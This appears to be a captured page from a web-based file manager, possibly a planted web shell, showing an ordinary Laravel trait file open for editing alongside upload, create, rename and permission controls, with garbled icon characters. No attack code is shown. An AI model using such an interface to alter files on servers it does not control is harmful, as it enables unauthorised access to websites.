Explorer
home
/
zoteqbgb
/
public_html
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Database
/
Console
/
Seeds
Location:
/home/zoteqbgb/public_html/vendor/laravel/framework/src/Illuminate/Database/Console/Seeds
Root path:
/home/zoteqbgb/public_html/config/676626
Editing: WithoutModelEvents.php
<?php namespace Illuminate\Database\Console\Seeds; use Illuminate\Database\Eloquent\Model; trait WithoutModelEvents { /** * Prevent model events from being dispatched by the given callback. * * @param callable $callback * @return callable */ public function withoutModelEvents(callable $callback) { return fn () => Model::withoutEvents($callback); } }
Save maftirs
Upload
Start Upload
New File
Create File
New Folder
Create Folder
Directory Contents
Name
Size
Perms
Modified
Actions
SeedCommand.php
3,495 bytes
0644
2025-01-31 15:04
âï¸
ðï¸
Rename
SeederMakeCommand.php
1,954 bytes
0644
2025-01-31 15:04
âï¸
ðï¸
Rename
WithoutModelEvents.php
406 bytes
0644
2025-01-31 15:04
âï¸
ðï¸
Rename
stubs
-
0755
2025-01-31 15:04
ðï¸
Rename
Chang
Apply